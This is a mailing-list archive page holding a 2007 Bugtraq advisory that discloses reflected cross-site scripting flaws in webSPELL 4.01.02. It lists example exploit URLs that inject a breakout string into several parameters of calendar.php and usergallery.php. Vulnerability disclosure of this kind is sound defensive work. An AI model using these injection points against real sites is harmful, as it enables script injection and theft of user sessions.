[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
From: brainheadbrainhead@xxxxxx
Date: 8 Dec 2007 22:53:59 -0000

###################
Autor: Brainhead                                                        
Type: XSS                                                   
Version:  4.01.02                               
Files: usergallery.php, calendar.php                        
Magic Quotes :off                                         
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=";>[your
 code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=";>[your 
code]

Prev by Date: Lotfian.com DATABASE DRIVEN TRAVEL SITE Multiple SQL Injection
Next by Date: [ GLSA 200712-09 ] Ruby-GNOME2: Format string error
Previous by thread: Lotfian.com DATABASE DRIVEN TRAVEL SITE Multiple SQL Injection
Next by thread: [ GLSA 200712-09 ] Ruby-GNOME2: Format string error
Index(es):
- Date
- Thread